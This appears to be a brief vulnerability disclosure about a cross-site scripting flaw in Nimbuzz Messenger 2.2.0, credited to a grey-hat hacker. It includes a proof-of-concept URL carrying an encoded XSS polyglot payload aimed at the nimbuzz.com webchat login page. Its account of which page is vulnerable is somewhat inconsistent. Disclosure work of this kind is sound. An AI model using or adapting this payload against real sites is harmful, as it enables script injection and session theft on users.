Grey Hat hacker "Sony" has discovered Cross Site Scripting vulnerability in Nimbuzz Messenger. According to his report, the Nimbuzz version 2.2.0 is vulnerable to XSS.
Hacker found vulnerability in the Chat Window-->View in Browser. (persistent code). The 'forget password' page is found to be vulnerable to XSS.
Vulnerable Link:
http://www.nimbuzz.com/webchat_login?lang=en&step=2&login=error
Poc:
http://www.nimbuzz.com/webchat_login?lang=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
Screenshot:
